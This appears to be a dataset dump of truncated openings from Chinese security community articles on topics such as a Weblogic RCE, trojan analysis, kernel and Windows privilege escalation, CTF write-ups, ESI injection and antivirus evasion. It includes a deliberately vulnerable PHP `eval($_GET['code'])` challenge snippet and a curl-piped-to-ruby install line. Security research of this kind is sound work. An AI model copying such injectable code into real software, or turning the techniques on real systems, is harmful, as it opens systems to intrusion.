译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**什么是 TFS(Team Foundation Server *... | 社区文章 |
# Weblogic 远程命令执行漏洞(CVE-2020-14645)分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:白帽汇安全研究院[@hu4wufu](https://github.com/hu4wufu "@hu4wufu")
核对:白帽汇安全研究院[@r4v3zn](https://github.com/r4v3zn "@r4v3zn")
## 前言
近期公布的关于 Weblogic 的反序列化RCE漏洞 CVE-2020-14645,是对 CVE-2020-2883的补丁进行绕过。之前的
CVE-2020-2883 本质上是通过 `ReflectionExtractor` 调... | 社区文章 |
# 披合法外衣的远控木马——Game564深入分析
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
译文仅供参考,具体内容表达以及含义原文为准。
近期360白名单分析组多次捕获到了假冒正规游戏公司的远控盗号木马,此类木马程序最新变种借助搜索引擎在假冒的游戏下载站中发布,该木马在与杀毒的对抗中不断升级和更新,采用劫持正规软件厂商文件的“白+黑”技术手段,还专门购买使用了某些公司的数字签名,具有较强的隐蔽性。
**对此360杀毒和安全卫士第一时间进行了拦截与查杀。**
**一、木马伪装**
Game564木马利用了国内知名的酷狗音乐后台服务主程序TsiService.exe自动加载active_desktop_r... | 社区文章 |
**作者:Lucifaer
作者博客:<https://lucifaer.com/2019/09/25/%E6%B5%85%E8%B0%88RASP/>**
本篇将近一个月对rasp的研究成果进行汇总,具体讨论RASP的优劣势以及一些个人的理解和看法。
### 0x01 概述
RASP是`Runtime application self-protection`的缩写,中文翻译为应用程序运行时防护,其与WAF等传统安全防护措施的主要区别于其防护层级更加底层——在功能调用前或调用时能获取访问到当前方法的参数等信息,根据这些信息来判定是否安全。
RASP与传统的基于流量监测的安全防护产品来说,优势点在于
**可以忽略各种绕过流量检测的... | 社区文章 |
# CVE-2021-43226 漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
2021年12月15日,微软patch thuesday发布新补丁后,我们观察到Windows Common Log File System Driver
模块修复了一个Elevation of Privilege 类型的漏洞[https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43226,](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43226%EF... | 社区文章 |
> Team:De1ta
## 0x00 Web
### **AMP**
由cookie提示flag在admin的cookie 应该是xss
post后会log
应该和amp标准有关 : <https://zh.wikipedia.org/zh-hans/Accelerated_Mobile_Pages>
AMP规范 : <https://www.ampproject.org/zh_cn/docs/fundamentals/spec>
猜测使用AMP特性绕过csp打到cookie
AMP获取cookies的方法:<https://github.com/ampproject/amphtml/blob/master/spec/amp-v... | 社区文章 |
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。
大家好,我们是 **红日安全-Web安全攻防小组** 。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫
[Web安全实战](https://github.com/hongriSec/Web-Security-Attack)
,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于 **漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python靶场基本上三种靶场全部涵盖)-实战演练**
(主要选择相应CMS或者是Vulnhub进行实战演练),如果对大家有帮助请... | 社区文章 |
细化总结,包括DNS、证书和枚举工具的具体原理, **泛解析问题** 的解决和对抗策略,优秀的收集和 **监控** 子域名工具推荐等。
* * *
## DNS:
### DNS域传送漏洞
Windows下的漏洞利用如上图所示,图源网络。
### 深入了解DNS域传送漏洞
DNS区域传送(DNS
transfer)指后备DNS服务器从主服务器获取数据,以更新自己的zone数据库。这可以防止因主DNS服务器故障造成的业务中断,为DNS服务提供了冗余备份。但是许多DNS服务器却被错误配置成只要收到AXFR请求,就向对方进行域传送。
当存在这种错误配置时,攻击者就可以获取整个域的所有记录,造成整个网络架构泄露。正确的配置包括
> allo... | 社区文章 |
# ESI(Edge Side Include )注入技术
##### 译文声明
本文是翻译文章,文章原作者 Louis Dion-Marcil,文章来源:gosecure.net
原文地址:<http://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/>
译文仅供参考,具体内容表达以及含义原文为准。
## 滥用缓存服务器导致服务端请求伪造(SSRF)和客户端攻击
Edge Side Includes (ESI)
是一种标记语言,主要在常见的HTTP代理(反向代理、负载均衡、缓存服务器、代理服务器)中使用。通过ESI注入技术可以导致服务端请求伪造(SS... | 社区文章 |
# 2016中国电脑恶意程序伪装与欺骗性研究报告
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
**文档下载链接:[](https://yunpan.cn/cE2yBgrwP4hn6)**[ **PDF**
****](https://yunpan.cn/cE4SgAnCQ4iLm) **、**[ **Word**
****](https://yunpan.cn/cE4Sg9Wv86tZh)
****发布日期:2017-01-03****
**研究背景**
由于免费安全软件在中国的高度普及,恶意程序的编写、制作门槛越来越高,恶意程序的传播也变得越来越困难。自201... | 社区文章 |
# NSCTF Bin 1500
|
##### 译文声明
本文是翻译文章,文章来源:Chu's BLoG
原文地址:<http://sh3ll.me/2015/09/28/nsctf-bin-1500/>
译文仅供参考,具体内容表达以及含义原文为准。
实战中体验了次 DEP & ASLR 的绕过。
## Fuzz 溢出点
题目里只给了个 PE 程序,运行程序后 `netstat -anbp tcp` 可以看到程序正在监听 2994 端口。PEiD 查看发现是 AsPack
的壳,`ESP 定律` 脱壳后丢到 IDA 中搜索欢迎信息(`shift F12`),F5 得到如下伪代码:
12345678910111213... | 社区文章 |
因某天突然奇想,之前安卓移动端查壳都是windows平台。使用起来每次都需要开虚拟机,贼麻烦!
就仿照Win版的PKID界面和功能写了一个跨平台的查壳工具。方便各位大佬使用。[安全脉搏SecPulse.com]
目前仅支持加固厂商:娜迦、梆梆、爱加密、通付盾、360加固、百度加固、阿里、腾讯、盛大、瑞星加、网秦、国信灵通、apkprotect、几维安全、顶像科技、网易易盾等常规厂商。
链接: <https://pan.baidu.com/s/1c3os8Qc> 密码: uw8v | 社区文章 |
**原文来自安全客,作者:Ivan1ee@360云影实验室
原文链接:<https://www.anquanke.com/post/id/176664>**
相关阅读:
* [《.NET 高级代码审计(第一课)XmlSerializer 反序列化漏洞》](https://paper.seebug.org/837/ "《.NET 高级代码审计(第一课)XmlSerializer 反序列化漏洞》")
* [《.NET 高级代码审计(第二课) Json.Net 反序列化漏洞》](https://paper.seebug.org/843/ "《.NET 高级代码审计(第二课) Json.Net 反序列化漏洞》")
* [《.... | 社区文章 |
#### CVE-2022-39198
##### 影响
2.7.x < version < 2.7.18
3.0.x < version < 3.0.12
3.1.x < version <= 3.1.0
##### 分析
###### 漏洞描述
我们可以看看在apache通告中对漏洞的简单的描述
很明显,从这个漏洞描述中,我们能够明白这个CVE的造成主要是因为dubbo中内置的hessian项目,主要是因为在`hessian-lite`中的`3.2.12`及以前版本中存在有这个漏洞
来看看是因为哪里造成了这个漏洞,以至于能够RCE
我们看看github的diff
<https://github.com/apache/dubbo-... | 社区文章 |
**关于查杀:**
主要分为两种方式
静态查杀:
针对的是杀毒软件的静态文件扫描,比如提取文件内一段特征码或者只有木马远控才会大量使用的函数来识别为是木马
动态查杀:
简单来说,就是如木马在执行的某些行为被杀毒软件拦截,就是动态查杀方式
**怎么样才能实现免杀呢?**
1.恶意的特征不要写死在纯代码上(如shellcode)
2.使用加密手段和混淆的方式又或者是多种编码
3.远程读取恶意代码进行分离加载
4.添加花指令,加壳等手段干扰杀软分析
5.针对杀软对于特征码的收集进行更换绕过
**进入正题,使用OCR图像识别的方式进行免杀**
这里我们先在百度智能云申请下OCR文字识别功能... | 社区文章 |
最近看到一篇关于利用云函数做免费代理池的文章,觉得蛮有意思的,于是也花时间研究了并实现了云函数的几个有趣的利用方式。
## HTTP 代理
### 原理
这是最为简单的利用方式。主要原理在于:
1. 云函数可利用 [API 网关触发器](https://cloud.tencent.com/document/product/583/9705)进行触发,接受来自客户端的数据
2. 可以对外发包,类似于一个 SSRF
### 实现
因此一个 HTTP Proxy 的实现思路就很简单了。客户端挂上代理发送数据包,HTTP 代理服务器拦截数据包,提取 HTTP
报文相关信息,然后将报文以某种形式 POST 到云函数进行解析,云函数根据... | 社区文章 |
# 安全情报成熟度模型分享与解读
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
介绍
时至今日,对于企业而言,如果竞争对手需要渗透进入他们的网络,那他们就能进入。下图呈现出近年来日益增长的全球性信息安全事件的调查图表。(图片来源:PwC,
The Global State of Information Security Survey 2015, www.pwc.com/gsiss2015)
Gartner 副总裁 Neil MacDonald 这样说到,到 2020
年企业的信息系统无疑将持续受到威胁,而面对先进的有针对性的攻击,他们根本无能为力。但至今仍有诸多企业把精力投... | 社区文章 |
文章作者:pt007@vip.sina.com
1、前置知识:
大家在渗透测试的时候经常会遇到时间戳(timestamp),时间戳用于防范burpsuite的抓包重放攻击,难倒了不少工具黑客,但是遇到代码级的黑客会如何解决这个问题呢?
一言不合上代码,先给出生成时间戳的python代码:
#!/user/bin/env python
#coding=utf8
#auther:pt007@vip.sina.com
import time
t = time.time()
timestamp=int(round(t * 1000))
timestamp=str(times... | 社区文章 |
# 从0到1——Hook内核系统调用
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
本文对kernel双机调试环境搭建、基础LKM编写、内核Hook系统调用、内核模块在不同机器上的加载进行了简单的介绍。
## 0x00 前言
先介绍一下背景吧,目前IOT设备发展可谓如火如荼,在研究的时候作为一个懒狗,总想能够找到一些比较通用的办法,root
shell已经不足以满足我了,于是就把罪恶的手伸向了内核,想要在内核里做一个Hook,但是在实际查看环境的时候才发现,很多IOT设备在出厂的时候,把
`build` 目录都给删了,能获取到的信息只有通过 `uname -sr`
查看到的版本号,因为对内核... | 社区文章 |
# Windows内网协议学习Kerberos篇之ASREQ& ASREP
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
author: daiker@360RedTeam
## 0x00 前言
熟悉内网渗透的应该都对IPC,黄金票据,白银票据,ntlm relay,Ptt,Ptk
这些词汇再熟悉不够了,对其利用工具也了如指掌,但是有些人对里面使用的原理还不太了解,知其然不知其所以然,本系列文章将针对内网渗透的常见协议(如kerbeos,ntlm,smb,ldap等)进行协议分析,相关漏洞分析以及漏洞工具分析利用。
kerberos篇将从四个方面来阐述kerberos协议,分别是kerberos... | 社区文章 |
# Intigriti XSS Challenge
Intigriti发布了一个有趣的小XSS挑战,它要求创建一个特殊的URL,既可以用来分配iframe的src,也可以发送到一个eval调用来弹出一个警报(document.domain),这是挑战的目标。但是我们如何实现?让我们回到开始,一步步分析。
注意:最终漏洞仅适用于Chrome,因此如果您想要跟进,我建议您使用Chrome。
主要代码:
<script>
const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|<|>/g... | 社区文章 |
# ASIS CTF - 三个魔法Web关WriteUp
|
##### 译文声明
本文是翻译文章,文章来源:thegoonies.rocks
原文地址:<https://thegoonies.rocks/asis-ctf-three-magic-web/>
译文仅供参考,具体内容表达以及含义原文为准。
比赛 : ASIS CTF
挑战名: Three Magic
类型 : Web
点数 : 267 pts
URL : <https://3magic.asis-ctf.ir/3magic/>
第一眼看这个挑战,通常是过滤一些字符或者增加一些限制来阻止命令执行,我通过输入&id到addr域,成功返回执行结果,可以确定这是一道命令执行的... | 社区文章 |
若依的rce点有两处,一处是定时任务,另外一处是thymeleaf的模板注入,本文着重针对定时任务的黑名单绕过
rce的原理分析其他师傅的文章已经讲的很明白了,此文不过多赘述
若依的定时任务为我们提供了可以执行某些类的某些方法,这些类方法必须满足以下条件
* 具有无参构造方法
* 调用的方法需要是类自身声明的方法,不能是他的父类方法
* 构造方法和调用的方法均为 public
## <4.6.2
这个版本之前无任何限制,可直接使用公开poc打
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassL... | 社区文章 |
随着web安全从业人员的增多,很多人都有个疑问:怎么洞越来越难挖了!!?大网站是不是没有这些漏洞!!?
原因是多样性的,一方面是漏洞隐藏的越来越深,另一方面是网站的架构正在发生改变;所以我们除了要提升自己的技术能力之外,我们也要顺应互联网的发展,针对不同的网站架构寻找不同着手点,也就是扩大信息收集的范围,这篇文章就是对微服务下信息收集的浅谈。在介绍正题之前,先聊聊网站应用的发展史。
## 网站应用发展
### 单一应用架构
当网站流量很小时,只需一个应用,将所有功能都部署在一起,以减少部署节点和成本。此时,用于简化增删改查工作量的数据访问框架(ORM)是关键。
### 垂直应用架构
当访问量逐渐增大,单一应用增加机器带来的加速度... | 社区文章 |
# Linux内核漏洞利用技术:覆写modprobe_path
|
##### 译文声明
本文是翻译文章,文章原作者 lkmidas,文章来源:lkmidas.github.io
原文地址:<https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
如果大家阅读过我此前发表的Linux内核漏洞利用的相关文章,可能会知道我们最近一直在学习这块内容。在过去的几周里,我的团队参加了DiceCTF和UnionCTF比赛,其中都包括了Linux内核PWN题目。凭借我有限的知识,在比赛过程中没有解出... | 社区文章 |
以为S2-045暂告一段落了。今天在订阅的sec-wiki又看到出来个Struts2-046: A new
vector,S2-046漏洞和S2-045漏洞很相似,都是由于对Header某个字段信息处理发生异常,错误信息连带着payload同过buildErrorMessage函数带入LocalizedTextUtil.findText造成的。
但是不同的是,这次漏洞的触发点在Content-Length和Content-Disposition字段的filename中。
最早看到的网上的poc是通过Content-Disposition字段的filename字段触发的。POC发出post请求形如:
从网上流传的POC地址拿到demo... | 社区文章 |
author:藏青@雁行安全团队
最近学习了`浅蓝`师傅寻找的一些JNDI漏洞的利用链受益匪浅,自己也尝试关于JNDI漏洞利用做一些挖掘,目前JNDI在利用过程我想到了两个问题。
* 测试每一个JNDI Bypass 利用链都需要手动更改URL很不方便,能否我去请求一个地址,让目标将我所有的链跑一遍?
* JNDI利用过程中可以通过反序列化利用,能否自动化探测反序列化利用链?
## 自动测试Bypass 利用链
为了让这种方式更加通用,我们首先考虑的是JDK原生的实现`ObjectFactory`的类,那么我注意到了下面几个类。
* com.sun.jndi.rmi.registry.RegistryContextFac... | 社区文章 |
**Author:SungLin@Knownsec 404 Team**
**Time: April 2, 2020**
**Chinese version:<https://paper.seebug.org/1164/>**
## 0x00 Background
On March 12, 2020, Microsoft confirmed that a critical vulnerability affecting
the SMBv3 protocol exists in the latest version of Windows 10, and assigned it
with CVE-2020-0796, which... | 社区文章 |
# 0x00前言
刷buu的时候遇到一道题,[GXYCTF2019]禁止套娃,涉及到无参数RCE,但是我不会,记录一下学习过程。
**实例**
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);
}
preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)
pre_match('/et|na|nt|strlen|info|path||rand|dec|bin|hex|oct|pi|exp|log/i', $code))
**解析*... | 社区文章 |
> 翻译文章,原文链接:
>
> <https://github.com/mcw0/pwn-hisilicon-> dvr/blob/master/README.adoc#defeating-aslr>
# 前言
该报告披露了使用HiSilicon
hi3520d和片上系统(SOC)构建的DVR/NVR设备的严重漏洞(具有POC代码)。利用漏洞会导致仅使用Web界面的未经授权的远程代码执行(RCE),导致被攻击设备的完全接管。由于缺乏升级固件,不建议使用这些设备。2016年12月之前已与供应商联系,但仍未得到回复。披露日期为2017年2月。
几年前我在eBay上购买了廉价的中文DVR设备。该设备的启动徽标显示:“SECULINK... | 社区文章 |
## 记一次红队经历
> 上学期临近考试周的一个下午,学校老师喊我和学弟参与一场红队活动,于是便有了下面的文章
>
> 印象很深的一个攻击目标是英语四六级考试网站....(我要是能打下来还苦逼背单词干什么)
首先开始前期的信息收集工作,利用zoomeye、nmap对目标IP段进行扫描,收集子域名等等。
上面是我在信息收集过程中收集的一些觉得脆弱可能存在问题的站点目标。(红队队员只需要 ~~输验证码试弱口令~~ 发现脆弱目标就好,捡软柿子捏
经过一番测试和批量扫描确定了几个存在漏洞的薄弱点。
##### 公网暴露路由器
当时在zoomeye看到一个很有趣的网页标题:TP-link
xxxx,这不是路由器吗。点击进入后看到这是一个暴... | 社区文章 |
# SOC异闻录:我和SOC不得不说的故事
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
>
>
>
> 就像是程序员,运维一样深夜”作案(jiaban)”总会遇到一些奇里古怪的事情,好歹我是经历过“大世面”的人,吓住,不可能的,让我们来数数那些在建设SOC遇到的奇怪事。
>
> #### 目录结构
>
> 0x00.关于SOC
>
> 0x01.SOC的产生
>
> 0x02.SOC开始建设
>
> 0x03.SOC稳定运行
>
> 0x04.那些奇怪事
>
> 0x05.SOC建设全过程
>
> 0x06.附录(CheckList)
>
> 致谢
## 0x00.关于SOC
首先,我在... | 社区文章 |
作者:Leeqwind
作者博客:<https://xiaodaozhi.com/kernel/31.html>
近期在研究和开发基于虚拟化的虚拟 HOOK 技术。在 Windows 7 x64 环境开发实测期间,发现针对 `NtCreateThreadEx` 函数的
HOOK 存在问题:该函数大部分情况下变得只返回 `0xC00000F2` (`STATUS_INVALID_PARAMETER_4`) 第 4
个参数无效的状态码。这导致系统出现很多问题,大部分的新线程都无法成功创建。为了解决这个问题,在这篇文章中对问题进行追溯,查找到底是哪里导致的。
经过追踪:发现位于在 `NtAllocateVirtualMemory` 中... | 社区文章 |
# 西湖论剑 IoT闯关赛 2020 pwn3 —— ezarmpwn
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
打了安恒举办的西湖论剑比赛,题目都是跑在一个开发板上的,通过数据线连接开发板的otg接口能访问题目环境。pwn题目一共有三道,其中有一道题目因为逻辑上的问题导致能比较简单的获得flag,另外一道题目是boa服务器在处理http认证过程中,发生栈溢出。我们这里分析的是这次比赛的第三道pwn题ezarmpwn。
## 题目分析
通过file和checksec能够知道程序为32位的arm小端程序,开启NX保护,没有PIE和canary保护。
主办方给出的libc为2.3... | 社区文章 |
本文翻译自:
<https://www.sentinelone.com/blog/mojaves-security-hardening-user-protections-bypassed/>
* * *
在macOS
Majave中,应用所有的API和对资源的直接访问都会需要请求用户的准许,用户也能够直接通过系统偏好设置访问它们的安全偏好设定。本文讲解如何绕过用户保护以及如何确保安全。
苹果macOS Mojave系统的签证特征之一就是用户安全。Mojave的一些安全相关的特征会改变用户与Mac操作系统交互的方式。
许多安全特征设计的目的就是为了防止一些event在没有明确授权的情况下访问用户数据,而event是构成AppleS... | 社区文章 |
# qemu逃逸学习
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## qemu的基本知识
### qemu 的内存配置
Guest' processes
+--------------------+
Virtual addr space | |
+--------------------+
| |... | 社区文章 |
# Safe-Linking——针对 malloc 安全防护机制
|
##### 译文声明
本文是翻译文章,文章原作者 checkpoint,文章来源:research.checkpoint.com
原文地址:<https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/>
译文仅供参考,具体内容表达以及含义原文为准。
## 简介
我们在Check Point
Research从事的每个研究项目的目标之一就是对软件的工作方式深入的分析:它们包含哪些组件?它们是否存在漏洞?攻击者如何利用这些漏洞... | 社区文章 |
作者: **xd0ol1@知道创宇404实验室**
#### 0 引子
在上一篇[文章](http://paper.seebug.org/351/)中,我们分析了 Office 文档型漏洞 CVE-2015-1641
的利用,本文将继续对此类漏洞中的另一常见案例
CVE-2015-2545([MS15-099](https://technet.microsoft.com/library/security/ms15-099))展开分析。相较而言,这些
Exp 的威胁性更大,例如可采用“Word EPS + Windows EoP”的组合,且很多地方借鉴了浏览器漏洞的利用思路,因此还是很值得我们学习研究的。
#### 1 样本信息
分析... | 社区文章 |
配置环境:MacOS,Burp Suite,Tor服务,Firefox浏览器和brew。
# brew
ps.brew 是 Mac 下的一个包管理工具,类似于 centos 下的 yum,可以很方便地进行安装/卸载/更新各种软件包。
安装tor服务(不是TorBrowser软件包)。在Mac上,您可以使用`brew install
tor`完成安装Tor服务。如果您没有安装brew,可以运行以下命令:
/usr/bin/ruby -e “$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)
要想获得更多关于brew的... | 社区文章 |
# 记一次对某站点的渗透测试(bypass)
## 0x01、起因
某天A把我留下,想让我检测一下某站点的安全程度(有授权的,领导的任务罢了)
我想了没想就拒绝了,说,上次不是给你挖出过一个sql注入了吗
他说,不亏待你,有额外奖励的
不是因为奖励啊,只是单纯的喜欢渗透网站罢了
垃圾水文,轻喷
## 0x02、一战
先访问某站(原谅我不放图片,不然无法过审)
看样子是一个平平无奇的网站
看到.action后缀,立马想到java环境,多半是tomcat+struts2
直接掏出大宝贝一把嗦
很明显失败了
不慌,再看看别的啥的
扫了端口发现oa系统,通过信息收集手段获取账号密码
但我认为此处功能点没什么用,故暂时放弃(打脸了)
掏出li... | 社区文章 |
原文:<https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288>
眼下,JavaScript已成为现代Web浏览器中最常用的技术之一,而且,使用客户端JavaScript框架(如AngularJS、ReactJS和Vue.js)构建的应用程序已经将大量功能和逻辑转移至前端。
随着客户端功能/逻辑的增加,客户端的攻击面也会随之增加。
作为安全测试人员,我们必须了解这些应用程序的攻击面。对我们来说,挖掘应用程序中的潜在安全问题,必须掌握相关的信息,... | 社区文章 |
# 【技术分享】点我的链接我就能知道你用了哪些chrome插件
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
咳咳,我知道干货一般阅读量会比较低,所以我借用了安全圈段子讲的最好的人惯用的漏洞标题风格。
由YSRC安全研究员evi1m0和neargle挖掘并编写poc,测试链接在文末。需要指出的是这是一个p(标)o(题)c(党),探测不全是正常的,本身就有很多插件不可以利用文中的方式探测,要不然就变成发chrome的0day了~
**0x01 About**
编写过 Chrome 扩展的开发人员都应该清楚在 crx 后缀的包中, manifest.json 配置清单文件提供了... | 社区文章 |
**作者:王铁磊@盘古实验室
公众号:<https://mp.weixin.qq.com/s/UBZv0pd7Nr-o-NMxjV53RQ>**
随着2019年进入最后一个月,整个2010年代即将成为过往。过去十年漏洞领域的研究发展,可谓波澜壮阔、精彩纷呈。我屡次提笔试图记录这十年的技术发展,最终都因为这个事情的难度远远超出自己的预想而弃笔。不过有些想法不吐不快,索性简单总结些个人观点,抛砖引玉供人讨论、补充和参考。
## 1、后PC时代,控制流完整性 (Control flow integrity) 成为新的系统安全基础性防护机制
2000年代后期,地址空间随机化(ASLR)和数据执行保护(DEP/W^X)成为两项通用的基础性... | 社区文章 |
# 密码学学习笔记:浅析On r-th Root Extraction Algorithm in Fq
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言:
在NCTF上遇到了一道出题人用来压轴的RSA,与正常RSA加密不同的是,本题的e是φ(p)和φ(q)的一个因子。在出题人给出hint后,我找到了一篇paper,侥幸用paper中提到的算法拿到了一血~
该算法可以在有限域Fq中开r次根,但需要s,满足r^s整除q-1,即r^s | q-1,并且s要小。
## On r-th Root Extraction Algorithm in Fq
paper: https://eprint.... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.